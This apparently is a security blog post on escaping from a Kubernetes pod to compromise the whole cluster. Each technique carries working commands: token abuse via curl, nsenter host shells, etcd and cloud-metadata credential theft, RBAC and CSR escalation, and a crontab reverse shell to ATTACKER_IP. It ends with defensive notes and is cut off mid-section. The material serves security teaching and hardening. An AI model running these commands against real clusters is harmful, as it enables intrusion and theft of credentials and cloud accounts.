Post

Kubernetes Escape: From Pod to Cluster Compromise

A technical deep-dive into Kubernetes escape techniques -- from service account abuse and kubelet exploitation to etcd pillaging and cloud metadata theft. Every pod is a potential foothold

Kubernetes Escape: From Pod to Cluster Compromise

As we covered in the Docker escape post, containers share the host kernel. Every isolation boundary is software – namespaces, cgroups, seccomp, capabilities. Kubernetes inherits all of that and stacks an entire distributed system on top: an API server, etcd, kubelets, service accounts, RBAC, flat networking, and cloud metadata endpoints. Each one is an attack vector.

A Docker escape gets you one host. A Kubernetes escape gets you the cluster.

Kubernetes Architecture – How It Actually Works

Before you can break something, you need to understand how it’s built.

A Kubernetes cluster has two parts: the control plane that makes decisions and the worker nodes that run your containers. Every single operation – scheduling a pod, reading a secret, exec-ing into a container – flows through one component.

flowchart TB
    subgraph cp["Control Plane"]
        API["API Server\n:6443"]
        ETCD["etcd\n:2379"]
        SCHED["Scheduler\n:10259"]
        CM["Controller Manager\n:10257"]
    end

    subgraph node1["Worker Node"]
        KL1["kubelet\n:10250"]
        KP1["kube-proxy"]
        CR1["Container Runtime\n(containerd)"]
        P1["Pod A"]
        P2["Pod B"]
    end

    subgraph node2["Worker Node"]
        KL2["kubelet\n:10250"]
        KP2["kube-proxy"]
        CR2["Container Runtime"]
        P3["Pod C"]
    end

    API <-->|"gRPC/mTLS"| ETCD
    SCHED -->|"HTTPS"| API
    CM -->|"HTTPS"| API
    KL1 <-->|"HTTPS"| API
    KL2 <-->|"HTTPS"| API
    KL1 -->|"CRI (gRPC)"| CR1
    KL2 -->|"CRI (gRPC)"| CR2
    CR1 --> P1 & P2
    CR2 --> P3

The API server (port 6443) is the single point of entry. kubectl commands, component communication, pod-to-API calls – all of it goes through here. It’s the only component that talks directly to etcd. With API server access you can read every secret, create privileged pods on any node, modify RBAC, and tamper with admission webhooks to inject code into every new pod. The old insecure HTTP port (8080) was removed in v1.24. Anonymous authentication is enabled by default upstream – most managed providers scope it down, but the flag is still true. Unauthenticated requests get system:anonymous, which has limited permissions unless someone added ClusterRoleBindings they shouldn’t have.

etcd (port 2379) is a distributed key-value store that holds all cluster state. Every secret, every pod spec, every RBAC policy, every service account token – stored in a flat key-value hierarchy under /registry/. By default, secrets are base64-encoded in etcd, not encrypted. The peer communication port (2380) handles replication between etcd cluster members. Both should require mTLS. Both sometimes don’t.

The scheduler (port 10259) watches for newly created pods with no assigned node and picks one based on resource requirements, affinity rules, taints, and tolerations. It only talks to the API server – never directly to nodes. The controller manager (port 10257) runs dozens of control loops: the replication controller ensures the right number of pod replicas, the node controller monitors node health, and the ServiceAccount controller creates default service accounts and tokens for new namespaces. The controller manager’s service account has broad cluster-wide permissions – its kubeconfig is a high-value target on control plane nodes.

On each worker node, the kubelet (port 10250) is the agent that receives pod specs from the API server and ensures containers are running. It also exposes an HTTPS API that supports exec, logs, and port-forwarding – meaning anyone who can reach port 10250 and bypass authentication can execute commands inside any container on that node. The old read-only port (10255) defaults to disabled when using kubelet config files (the modern approach), but the CLI flag historically defaulted to 10255 – and GKE didn’t disable it by default until v1.32. It still appears in plenty of clusters. The container runtime (containerd, CRI-O) does the actual work of pulling images and running containers via the CRI gRPC interface on a local Unix socket (/run/containerd/containerd.sock). Dockershim was removed in v1.24 – if you’re still seeing /var/run/docker.sock, the cluster is either old or doing something unusual.

kube-proxy runs on every node and implements the Service abstraction using iptables rules (default), IPVS, or nftables. It watches the API server for Service and EndpointSlice changes, then updates local network rules. NodePort services expose on ports 30000-32767 by default – another surface to scan.

Every API request passes three gates: authentication (X.509 certs, bearer tokens, OIDC), authorization (RBAC by default, Node authorization for kubelets), and admission controllers (mutating webhooks first, then validating). Three chances to stop a bad request. Three things that can be misconfigured.

The Security Boundaries

Kubernetes has security features. On paper, they look solid.

Pod Security Standards

Pod Security Standards (PSS) replaced PodSecurityPolicy (removed in v1.25). Three levels:

  • Privileged – unrestricted. Everything allowed.
  • Baseline – blocks known privilege escalation vectors. No privileged: true, no hostPID, no hostNetwork, no hostPath volumes. Still allows running as root.
  • Restricted – hardened. Must run as non-root, must drop ALL capabilities (except NET_BIND_SERVICE), requires a seccomp profile.

Enforcement is per-namespace via labels. Here’s the thing – if you don’t add those labels, you get Privileged. The default is no enforcement at all.

RBAC

You know how RBAC works. The part that matters here: the API server prevents you from creating a Role with permissions you don’t already hold – unless you have the escalate verb. And there are a dozen other escalation paths (create pods, bind, impersonate, wildcards) that most teams don’t realize are dangerous. More on those in Technique 7.

Network Policies

By default, every pod can talk to every other pod. Across namespaces. No restrictions. NetworkPolicies can restrict this, but they require a CNI plugin that supports them (Calico, Cilium – not Flannel). And they have to be explicitly created. Most clusters don’t have any.

Service Account Tokens

Every pod gets a service account token auto-mounted at /var/run/secrets/kubernetes.io/serviceaccount/token. Since Kubernetes 1.22, these are projected tokens – time-limited (1 hour, kubelet refreshes them), audience-bound, and tied to the pod’s lifecycle. Kubernetes 1.24 went further and stopped auto-creating long-lived Secret-based tokens entirely. Better than the old never-expiring tokens, but they’re still auto-mounted by default and still let you authenticate to the API server.

Admission Controllers

OPA/Gatekeeper and Kyverno are the two main policy engines. They intercept API requests and can block pods that violate security policies – no privileged containers, no hostPath mounts, required labels. They’re powerful. They’re also optional add-ons that most clusters don’t have configured.

Secrets Management

Kubernetes Secrets are base64-encoded, not encrypted. Encryption at rest exists via EncryptionConfiguration but isn’t enabled by default. Everything in etcd – database passwords, API keys, TLS private keys – is one base64 -d away from plaintext.

flowchart TB
    subgraph cluster["Kubernetes Cluster"]
        direction TB
        subgraph policy["Policy Layer"]
            PSS["Pod Security Standards\n(default: unenforced)"]
            RBAC["RBAC\n(default: permissive)"]
            AC["Admission Controllers\n(optional add-ons)"]
        end
        subgraph network["Network Layer"]
            NP["Network Policies\n(default: allow all)"]
            SVC["Service Mesh / mTLS\n(optional)"]
        end
        subgraph data["Data Layer"]
            SA["SA Tokens\n(auto-mounted)"]
            SEC["Secrets\n(base64, not encrypted)"]
        end
        subgraph runtime["Runtime Layer"]
            SC["Security Context"]
            SECC["Seccomp / AppArmor"]
            NS["Linux Namespaces"]
            CG["Cgroups"]
        end
    end
    runtime --> KERNEL["Shared Host Kernel"]

Every layer above is opt-in, misconfigurable, or both. The NSA/CISA Kubernetes Hardening Guide and Red Hat’s annual State of Kubernetes Security report consistently find the same gaps in production: over-privileged service accounts, no network segmentation, containers running as root, secrets unencrypted at rest.


Escape Techniques

1. Service Account Token Abuse

This is the technique that actually gets exploited the most in real assessments. Not kernel zero-days, not runtime escapes – just a service account token sitting in a predictable path, waiting to be read.

Every pod gets a token mounted automatically unless someone explicitly set automountServiceAccountToken: false. Most teams don’t.

The token sits at /var/run/secrets/kubernetes.io/serviceaccount/token. The API server address is in the KUBERNETES_SERVICE_HOST environment variable. The CA cert for TLS is at /var/run/secrets/kubernetes.io/serviceaccount/ca.crt. Everything you need to authenticate is already there.

flowchart LR
    POD["Compromised Pod"] -->|"read token"| SA["/var/run/secrets/.../token"]
    SA -->|"Bearer auth"| API["API Server :6443"]
    API -->|"enumerate"| PERMS["Permissions"]
    PERMS -->|"if overprivileged"| SECRETS["Read Secrets"]
    PERMS -->|"if overprivileged"| PODS["Create Pods"]
    PERMS -->|"if overprivileged"| EXEC["Exec into Pods"]
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
# Step 1: Read the token and discover the API server
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
NAMESPACE=$(cat /var/run/secrets/kubernetes.io/serviceaccount/namespace)
APISERVER="https://${KUBERNETES_SERVICE_HOST}:${KUBERNETES_SERVICE_PORT}"
CACERT=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt

# Step 2: Check what permissions this service account has
# (kubectl is rarely in production containers -- stick to curl)
curl -s --cacert $CACERT -H "Authorization: Bearer $TOKEN" \
  "$APISERVER/apis/authorization.k8s.io/v1/selfsubjectrulesreviews" \
  -X POST -H "Content-Type: application/json" \
  -d '{"apiVersion":"authorization.k8s.io/v1","kind":"SelfSubjectRulesReview","spec":{"namespace":"'$NAMESPACE'"}}'

# Step 3: If you can list secrets -- grab them all
curl -s --cacert $CACERT -H "Authorization: Bearer $TOKEN" \
  "$APISERVER/api/v1/namespaces/$NAMESPACE/secrets"
# Output: JSON containing every secret in the namespace, base64-encoded

# Step 4: If you can create pods -- spawn a privileged one
# NOTE: This will be rejected if Pod Security Standards (baseline/restricted)
# or admission controllers (OPA/Gatekeeper, Kyverno) are enforced.
# On a hardened cluster, you'll get a 403 with a policy violation message.
curl -s --cacert $CACERT -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  "$APISERVER/api/v1/namespaces/$NAMESPACE/pods" \
  -X POST -d '{
    "apiVersion": "v1",
    "kind": "Pod",
    "metadata": {"name": "pwn"},
    "spec": {
      "containers": [{
        "name": "pwn",
        "image": "ubuntu",
        "command": ["sleep","infinity"],
        "securityContext": {"privileged": true}
      }],
      "hostPID": true,
      "hostNetwork": true
    }
  }'

If the service account has cluster-admin or wildcard permissions – reading every secret in every namespace, creating privileged pods, modifying RBAC – that’s full cluster compromise from a single pod. And it happens more often than you’d think. Monitoring agents, CI/CD runners, and Helm-deployed operators regularly get over-privileged service accounts. Security audits consistently find the majority of clusters have excessive RBAC permissions.

peirates (by InGuardians) automates this entire workflow from inside a compromised pod. It discovers service accounts, switches between them, enumerates permissions, harvests secrets, and finds the shortest path to cluster-admin. It’s available in Kali Linux and is built specifically for this attack chain.

Defensive notes: Set automountServiceAccountToken: false on ServiceAccounts and Pods that don’t need API access. Use least-privilege RBAC – never bind cluster-admin to workload service accounts. On 1.24+, projected tokens are short-lived by default, but they still grant access if RBAC is over-permissioned.

2. Privileged Pod Escape

Straight callback to the Docker escape post. If you read that one, you already know how this ends.

When a pod runs with securityContext.privileged: true, the container runtime drops all security barriers: every Linux capability is granted (including CAP_SYS_ADMIN), seccomp filtering is disabled, AppArmor/SELinux confinement is removed, and the container gets full access to the host’s /dev devices. The container is root on the host with a slightly different filesystem view.

flowchart LR
    PRIV["Privileged Pod\n+ hostPID: true"] -->|"nsenter"| PID1["Host PID 1"]
    PID1 --> HOST["Root Shell on Host"]
    HOST --> KUBELET["Kubelet Credentials"]
    HOST --> SECRETS["Node-level Secrets"]
    HOST --> OTHER["Other Pods on Node"]
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
# Step 1: If you land in a privileged pod with hostPID, it's one command
# (nsenter is in util-linux — most base images include it, but minimal
# images like distroless won't. If missing, mount the host disk instead.)
nsenter --target 1 --mount --uts --ipc --net --pid -- bash
# You are now root on the host node

# Step 2: Verify
hostname          # host's real hostname, not the pod name
cat /etc/os-release
ip addr           # host network interfaces
ps aux            # every process on the node

# Step 3: Grab the kubelet's credentials for lateral movement
cat /var/lib/kubelet/kubeconfig
cat /var/lib/kubelet/pki/kubelet-client-current.pem
cat /etc/kubernetes/admin.conf  # if this is a control plane node -- jackpot

Without hostPID, you can still mount the host’s disk directly:

1
2
3
4
5
6
7
8
9
10
11
12
13
# Inside a privileged pod (without hostPID)
# Step 1: Find the host's root partition
fdisk -l
# Output: /dev/sda1, /dev/vda1, or /dev/nvme0n1p1

# Step 2: Mount it
mkdir -p /mnt/host
mount /dev/sda1 /mnt/host

# Step 3: Steal everything
cat /mnt/host/etc/shadow
cat /mnt/host/etc/kubernetes/admin.conf
cat /mnt/host/root/.ssh/id_rsa

As we covered in the Docker escape post, --privileged gives you full node access. In Kubernetes, it’s the same flag in a different config file.

Defensive notes: Enforce Pod Security Standards at baseline or restricted level – both block privileged: true, hostPID, and hostNetwork. Use OPA/Gatekeeper or Kyverno to enforce this cluster-wide.

3. Host Path Mounts

You don’t need a privileged pod if someone helpfully mounted the host filesystem for you.

I keep seeing this in the wild: monitoring agents with /var/log, log shippers with /var/lib/docker/containers, dev teams with / mounted because “it’s just staging.” Every one of these is a container escape waiting to happen.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
# A pod spec that gives you the entire host filesystem
apiVersion: v1
kind: Pod
metadata:
  name: hostpath-exploit
spec:
  containers:
  - name: exploit
    image: ubuntu:latest
    command: ["sleep", "infinity"]
    volumeMounts:
    - name: host-root
      mountPath: /host
  volumes:
  - name: host-root
    hostPath:
      path: /
      type: Directory
1
2
3
4
5
6
7
8
9
10
11
12
13
# Once inside, the host root is at /host
# Step 1: Steal credentials
cat /host/etc/shadow
cat /host/etc/kubernetes/admin.conf
cat /host/var/lib/kubelet/kubeconfig
cat /host/root/.ssh/id_rsa

# Step 2: Plant persistence
echo "ssh-rsa AAAA...your-key" >> /host/root/.ssh/authorized_keys
echo "* * * * * root bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1" >> /host/etc/crontab

# Step 3: Or just chroot and become the host
chroot /host bash

Mounting /var/run/docker.sock (or /run/containerd/containerd.sock on modern clusters) is equally lethal – it gives you control over the container runtime, which means you can create new privileged containers. As we covered in the Docker escape post, socket access equals daemon access equals root on the host. On modern clusters running containerd, the socket uses gRPC instead of a REST API, so exploitation requires ctr or crictl instead of curl:

1
2
3
# With containerd socket mounted at /run/containerd/containerd.sock
ctr -a /run/containerd/containerd.sock containers list
crictl --runtime-endpoint unix:///run/containerd/containerd.sock pods

Even mounting something seemingly innocent like /var/log can be dangerous – host logs may contain authentication attempts, cloud-init bootstrap tokens, or symlinks that can be abused to read arbitrary files through the kubelet’s log endpoint.

Defensive notes: PSS baseline and restricted both block hostPath volumes. If you must use them, restrict to specific paths and mount read-only. Never mount /, /etc, or runtime sockets into workload pods.

4. Kubelet API – The Forgotten Door

Every worker node runs a kubelet. The kubelet exposes an HTTPS API on port 10250. This API can list pods, read logs, and – critically – execute commands inside any container on that node.

The kubelet also historically exposed a read-only HTTP API on port 10255 (disabled by default since v1.16, but still found in older or misconfigured clusters). Even the read-only port leaks pod specs, environment variables, and metadata.

The key configuration flags are --anonymous-auth and --authorization-mode. The upstream Kubernetes defaults are insecure: --anonymous-auth=true and --authorization-mode=AlwaysAllow. Most managed providers (GKE, EKS, AKS) and kubeadm override these to use Webhook authorization and disable anonymous auth. But self-managed clusters, custom installations, and legacy deployments often ship with the upstream defaults – and that means anyone with network access to port 10250 can exec into any container on that node. kube-hunter (Aqua Security) can scan for this automatically: kube-hunter --remote NODE_IP --active will probe the kubelet and report if anonymous exec is possible.

sequenceDiagram
    participant A as Attacker
    participant K as Kubelet :10250
    participant P1 as Pod A
    participant P2 as Pod B
    participant P3 as Pod C

    A->>K: GET /pods (list all pods on node)
    K-->>A: Pod names, namespaces, containers
    A->>K: POST /run/default/pod-a/container (exec)
    K->>P1: Execute command
    P1-->>K: Command output
    K-->>A: "uid=0(root)"
    A->>K: POST /run/kube-system/pod-b/container
    K->>P2: Execute command
    Note over A,P2: Lateral movement across<br/>all pods on this node
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
# These commands assume anonymous auth is enabled and authorization is AlwaysAllow.
# On properly configured clusters, you'll get 401 Unauthorized or 403 Forbidden.
# Managed providers (EKS, GKE, AKS) typically block this by default.

# Step 1: List all pods on the node
curl -sk https://NODE_IP:10250/pods | jq '.items[].metadata.name'
# Output (if unauthenticated access is allowed):
# "coredns-5dd5756b68-abc12"
# "kube-proxy-xyz78"
# "nginx-deployment-7f9b8c-def34"

# Step 2: Execute a command in any container
# Format: /run/<namespace>/<pod>/<container>
curl -sk https://NODE_IP:10250/run/default/nginx-deployment-7f9b8c-def34/nginx \
  -d "cmd=id"
# Output: uid=0(root) gid=0(root) groups=0(root)

# Step 3: Steal the service account token from that pod
curl -sk https://NODE_IP:10250/run/default/nginx-deployment-7f9b8c-def34/nginx \
  -d "cmd=cat /var/run/secrets/kubernetes.io/serviceaccount/token"
# Output: eyJhbGciOiJSUzI1NiIsImtpZCI6I... (JWT token)

# Step 4: Read container logs
curl -sk https://NODE_IP:10250/containerLogs/kube-system/coredns-5dd5756b68-abc12/coredns

The kubeletctl tool (by CyberArk) automates this:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
# Scan a network for open kubelet APIs
kubeletctl scan --cidr 10.0.0.0/24

# List pods on a specific node
kubeletctl pods --server 10.0.0.1

# Scan for containers that allow RCE
kubeletctl scan rce --server 10.0.0.1

# Scan for service account tokens
kubeletctl scan token --server 10.0.0.1

# Execute a command (run = non-interactive, returns output directly)
kubeletctl run "cat /etc/shadow" -p nginx-pod -c nginx -s 10.0.0.1

From a single compromised pod, you reach the node’s kubelet. From the kubelet, you exec into every other pod on that node. Steal their service account tokens. Find one with elevated permissions. Pivot to the API server. If the node has nodes/proxy permissions exposed via RBAC, you can even proxy API requests through the kubelet to other kubelets – hopping across nodes without touching the API server directly.

This is exactly how real attacks work. TeamTNT’s Hildegard campaign (2021, documented by Palo Alto Unit 42) scanned for unauthenticated kubelets, exec’d into pods, stole service account tokens and cloud credentials, established C2 channels, and deployed cryptominers across entire clusters. The kubelet was the initial foothold. Everything else cascaded from there.

Defensive notes: Set --anonymous-auth=false and --authorization-mode=Webhook on all kubelets. Restrict network access to port 10250 – only the control plane should reach it. Enable the NodeRestriction admission plugin to limit what kubelets can read to only their own node’s pods.

5. etcd – Secrets in Plaintext

etcd is the brain of the cluster. Every object that exists in Kubernetes – every pod, every secret, every RBAC policy, every service account – is a key-value pair in etcd. Compromise etcd and you skip the API server entirely. No RBAC checks, no admission controllers, no audit logs. Just raw, unfiltered access to everything.

Default kubeadm installations put etcd on port 2379 with mTLS. But “default” and “what’s actually deployed” are different things. Misconfigured clusters expose etcd without TLS, listen on 0.0.0.0 instead of localhost, or use weak certificate management. Shodan regularly finds thousands of exposed etcd instances.

flowchart LR
    ATTACKER["Attacker"] -->|"port 2379"| ETCD["etcd"]
    ETCD --> SECRETS["All Secrets\n(base64)"]
    ETCD --> TOKENS["SA Tokens"]
    ETCD --> RBAC["RBAC Policies"]
    ETCD --> CERTS["TLS Certificates"]
    ETCD --> PODS["Pod Specs\n(env vars, volumes)"]
    SECRETS & TOKENS --> CLUSTER["Full Cluster\nCompromise"]
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
# Most production clusters require mTLS for etcd access.
# Plain HTTP access (below) indicates severe misconfiguration.
# If you've compromised a control plane node, the TLS certs are at
# /etc/kubernetes/pki/etcd/ — use those instead (shown in Step 4).

# Step 1: Connect to etcd (unauthenticated -- misconfigured)
export ETCDCTL_API=3
etcdctl --endpoints=http://ETCD_IP:2379 endpoint health
# Output: http://ETCD_IP:2379 is healthy

# Step 2: Enumerate all keys
etcdctl --endpoints=http://ETCD_IP:2379 get / --prefix --keys-only | head -20
# Output:
# /registry/clusterrolebindings/cluster-admin
# /registry/clusterroles/cluster-admin
# /registry/configmaps/kube-system/coredns
# /registry/secrets/default/database-credentials
# /registry/secrets/kube-system/admin-token-xxxxx
# /registry/serviceaccounts/default/default
# ...

# Step 3: Extract all secrets
etcdctl --endpoints=http://ETCD_IP:2379 get /registry/secrets --prefix | strings
# Output: raw strings from protobuf-encoded secrets including
# base64 values that decode to passwords, API keys, TLS private keys

# Step 4: If etcd requires TLS (and you have the certs from a compromised node)
etcdctl --endpoints=https://127.0.0.1:2379 \
  --cacert=/etc/kubernetes/pki/etcd/ca.crt \
  --cert=/etc/kubernetes/pki/etcd/server.crt \
  --key=/etc/kubernetes/pki/etcd/server.key \
  get /registry/secrets --prefix --keys-only

# Step 5: Extract a specific secret
etcdctl --endpoints=http://ETCD_IP:2379 \
  get /registry/secrets/default/database-credentials
# Pipe through strings or hexdump to extract the base64 values

The impact is total. With etcd write access, you can also modify RBAC policies, inject malicious pod specs, and create new cluster-admin bindings – all without going through the API server’s admission controllers or audit logging. You’re operating below the security model entirely.

If etcd is compromised, the cluster is gone. Recovery means rotating every credential – every service account token, every TLS certificate, every secret, every kubeconfig. There’s no shortcut. CVE-2021-28235 (CVSS 9.8) demonstrated this directly – an authentication bypass in etcd allowed unauthenticated access to the entire datastore. And CVE-2023-32082 (CVSS 3.1) showed that even etcd’s own RBAC had authorization bypass issues, with the LeaseTimeToLive API returning key names the requesting user shouldn’t have been able to see. TeamTNT actively scanned for exposed etcd instances, extracted secrets, and used the stolen cloud credentials for lateral movement into AWS and GCP accounts.

Defensive notes: Enable encryption at rest via EncryptionConfiguration (use aescbc or KMS provider). Require mTLS for all etcd client and peer communication. Bind etcd to localhost only. Restrict network access to port 2379 – only the API server should have etcd client certificates.

6. Cloud Metadata API – From Pod to Cloud Account

This is the one that turns a container compromise into a cloud account takeover. If your cluster runs on AWS, GCP, or Azure, there’s a metadata endpoint reachable from every pod that hands out IAM credentials to anything that asks.

The endpoint is 169.254.169.254 on AWS and Azure, metadata.google.internal (also 169.254.169.254) on GCP. But the headers, paths, and token mechanisms differ across providers.

flowchart LR
    POD["Compromised Pod"] -->|"curl 169.254.169.254"| META["Cloud Metadata API"]
    META -->|"IAM credentials"| CREDS["Temporary Access Keys"]
    CREDS --> S3["S3 Buckets"]
    CREDS --> EC2["EC2 Instances"]
    CREDS --> RDS["Databases"]
    CREDS --> IAM["IAM Escalation"]
    IAM --> ACCOUNT["Full Cloud Account"]

AWS (IMDSv1 – no token required):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
# Step 1: Discover the IAM role attached to the node
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Output: eks-node-role

# Step 2: Get temporary credentials
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/eks-node-role
# Output:
# {
#   "AccessKeyId": "ASIA...",
#   "SecretAccessKey": "wJal...",
#   "Token": "FwoGZXIvY...",
#   "Expiration": "2026-03-25T20:00:00Z"
# }

# Step 3: Use them
export AWS_ACCESS_KEY_ID="ASIA..."
export AWS_SECRET_ACCESS_KEY="wJal..."
export AWS_SESSION_TOKEN="FwoGZXIvY..."
aws s3 ls                    # list all S3 buckets
aws ec2 describe-instances   # list all EC2 instances
aws iam list-roles           # enumerate IAM roles

AWS IMDSv2 adds a session token requirement. It’s meant to block SSRF attacks because it requires a PUT request with a hop limit:

1
2
3
4
5
6
7
# IMDSv2 requires a token first (PUT request with TTL header)
TOKEN=$(curl -s -X PUT "http://169.254.169.254/latest/api/token" \
  -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")

# Then use the token for metadata requests
curl -s -H "X-aws-ec2-metadata-token: $TOKEN" \
  http://169.254.169.254/latest/meta-data/iam/security-credentials/

But here’s the catch – if you’re already inside the pod (not doing SSRF from outside), you can make the PUT request yourself. IMDSv2’s real defense is the hop limit: the PUT response has an IP TTL of 1, so it can’t traverse network hops. Since Kubernetes pods are in a separate network namespace from the host, this should block pod access. But EKS sets the hop limit to 2 by default on managed node groups, specifically so pods can reach IMDS. So on EKS, IMDSv2 is no obstacle from a compromised pod.

GCP uses a different endpoint and requires the Metadata-Flavor: Google header (requests with X-Forwarded-For are rejected as SSRF protection):

1
2
3
4
# Get an access token for the node's service account
curl -s -H "Metadata-Flavor: Google" \
  "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"
# Output: {"access_token":"ya29.c.Eln...","expires_in":3599,"token_type":"Bearer"}

On older GKE clusters, the metadata endpoint also exposed kube-env, which contained kubelet bootstrap credentials – one HTTP request from a pod gave you node-level API access.

Azure uses the Metadata:true header and a different URL path:

1
2
3
4
# Get a managed identity token for Azure Resource Manager
curl -s -H "Metadata:true" \
  "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"
# Output: {"access_token":"eyJ0eXA...","expires_in":"86399","token_type":"Bearer"}

AWS has mitigations: EKS supports IRSA (IAM Roles for Service Accounts) and EKS Pod Identity, which use OIDC to provide pod-level IAM credentials without touching the metadata API. GKE has Workload Identity. Azure has Azure AD Workload Identity. But these have to be configured – the default on all three clouds is that the node’s IAM role is accessible from every pod.

This is how you go from a pod to owning the cloud account. Capital One’s 2019 breach – 106 million customer records – started with exactly this pattern: SSRF to the metadata API, stolen IAM credentials, S3 data exfiltration. Tesla’s 2018 Kubernetes breach (discovered by RedLock) followed the same path: exposed Kubernetes dashboard, AWS credentials in pod environment variables, cryptomining on Tesla’s AWS infrastructure.

Defensive notes: Use pod-level identity instead of node-level: IRSA or EKS Pod Identity on AWS, Workload Identity on GKE, Azure AD Workload Identity on AKS. Block egress to 169.254.169.254/32 via NetworkPolicy for pods that don’t need metadata access. On AWS, enforce IMDSv2-only with hop limit of 1 to block pod access entirely.

7. RBAC Misconfigurations and Privilege Escalation

This is where most teams mess up. RBAC is supposed to prevent everything above, but the gap between “we have RBAC” and “our RBAC is actually secure” is enormous. I’ve reviewed clusters where the CI/CD service account had cluster-admin because someone copied a Helm chart example three years ago and never revisited it.

Several permissions look harmless but are actually escalation paths:

flowchart TB
    PERMS["Dangerous RBAC Permissions"]
    PERMS --> CP["create pods"]
    PERMS --> CRB["create clusterrolebindings\n+ bind verb"]
    PERMS --> ESC["escalate verb\non roles"]
    PERMS --> IMP["impersonate\nusers/groups"]
    PERMS --> WILD["wildcard *\non verbs/resources"]
    PERMS --> CSR["create/approve\nCSRs"]

    CP --> PRIV["Mount any SA token\nRun privileged"]
    CRB --> ADMIN["Bind cluster-admin\nto yourself"]
    ESC --> ADMIN2["Create role with\nany permission"]
    IMP --> MASTERS["Act as\nsystem:masters"]
    WILD --> GOD["Implicitly includes\nall of the above"]
    CSR --> CERT["Forge certificates\nfor system:masters"]

create pods is the most common escalation. If you can create a pod, you can specify any service account (spec.serviceAccountName), mount hostPath volumes, and run privileged. That one permission gives you everything.

escalate on roles bypasses the API server’s guard against privilege escalation. Normally you can’t create a Role with more permissions than you have. The escalate verb removes that check entirely.

bind on roles/clusterroles lets you create a RoleBinding or ClusterRoleBinding referencing any existing role, including cluster-admin, without holding those permissions yourself.

impersonate lets you make API requests as any user or group. Including system:masters, which is hardcoded to bypass all RBAC.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
# The RBAC commands below use kubectl for clarity.
# In a real engagement, you'd use curl against the API server with a stolen token
# (as shown in Technique 1). kubectl is shown here because RBAC syntax is clearer.

# Step 1: Enumerate what you can do
kubectl auth can-i --list
# Look for: create pods, create clusterrolebindings, escalate, bind, impersonate

# Step 2: If you can create clusterrolebindings -- give yourself cluster-admin
kubectl create clusterrolebinding pwn \
  --clusterrole=cluster-admin \
  --serviceaccount=default:compromised-sa

# Step 3: If you can impersonate -- become system:masters (bypasses ALL RBAC)
kubectl get secrets --all-namespaces \
  --as=anything --as-group=system:masters

# Step 4: If you can create pods -- create one with a high-privilege SA
kubectl apply -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
  name: escalation
  namespace: kube-system
spec:
  serviceAccountName: clusterrole-aggregation-controller
  automountServiceAccountToken: true
  containers:
  - name: steal
    image: ubuntu
    command: ["sleep", "infinity"]
EOF

# Step 5: Exec in and use the stolen token
kubectl exec -it escalation -n kube-system -- bash
cat /var/run/secrets/kubernetes.io/serviceaccount/token
# Now authenticate to the API server with this token's permissions

# Step 6: CSR-based escalation (if you can create and approve CSRs)
# NOTE: The CertificateSubjectRestriction admission plugin (enabled by default)
# blocks CSRs requesting O=system:masters with the kube-apiserver-client signer.
# This attack only works if that plugin is disabled or a custom signer is used.
openssl genrsa -out attacker.key 2048
openssl req -new -key attacker.key -out attacker.csr \
  -subj "/CN=attacker/O=system:masters"

kubectl apply -f - <<EOF
apiVersion: certificates.k8s.io/v1
kind: CertificateSigningRequest
metadata:
  name: attacker-csr
spec:
  request: $(cat attacker.csr | base64 | tr -d '\n')
  signerName: kubernetes.io/kube-apiserver-client
  usages: ["client auth"]
EOF

kubectl certificate approve attacker-csr
kubectl get csr attacker-csr -o jsonpath='{.status.certificate}' | base64 -d > attacker.crt
# You now have a client cert for the system:masters group

kubectl-who-can (Aqua Security) helps you find these misconfigurations:

1
2
3
4
5
kubectl who-can create pods -n kube-system
kubectl who-can create clusterrolebindings
kubectl who-can escalate clusterroles
kubectl who-can impersonate users
kubectl who-can create pods --subresource=exec --all-namespaces

The NSA/CISA Kubernetes Hardening Guide, the Trail of Bits Kubernetes audit, and the OWASP Kubernetes Top 10 all flag RBAC misconfiguration as the most prevalent and dangerous issue in production clusters.

Defensive notes: Audit RBAC regularly with kubectl-who-can. Never grant create pods, escalate, bind, or impersonate to workload service accounts. Use kubeaudit or Fairwinds Polaris to scan for over-privileged roles. Avoid wildcards (*) in verbs, resources, or apiGroups.

8. Container Runtime Exploits and Kernel Attacks

Everything above relies on misconfiguration. This section is different – these are bugs in the software itself, and no amount of policy fixes them.

As we covered in the Docker escape post, containers share the host kernel. A kernel vulnerability exploitable from within a container means every pod on the node is a potential breakout vector. DirtyCow, DirtyPipe (CVE-2022-0847), CVE-2022-0185 (heap overflow in Linux filesystem context handling – exploitable from unprivileged containers with user namespace CAP_SYS_ADMIN) – if it gives you local privilege escalation on Linux, it works from inside a container. This isn’t theoretical. Siloscape (2021, discovered by Palo Alto Unit 42) was the first known malware targeting Windows containers to compromise cloud environments – it exploited Windows container isolation flaws to reach the host, then used the node’s kubelet credentials to spread across the cluster and deploy backdoor pods.

But container runtime vulnerabilities are even more direct.

CVE-2024-21626 – Leaky Vessels (runc, CVSS 8.6)

Discovered by Snyk’s Rory McNamara in January 2024, this is one of the most critical container escapes ever found. The bug: runc leaked a file descriptor to the host’s /sys/fs/cgroup directory into the container process. The fd wasn’t marked O_CLOEXEC and wasn’t closed before executing the container’s entrypoint.

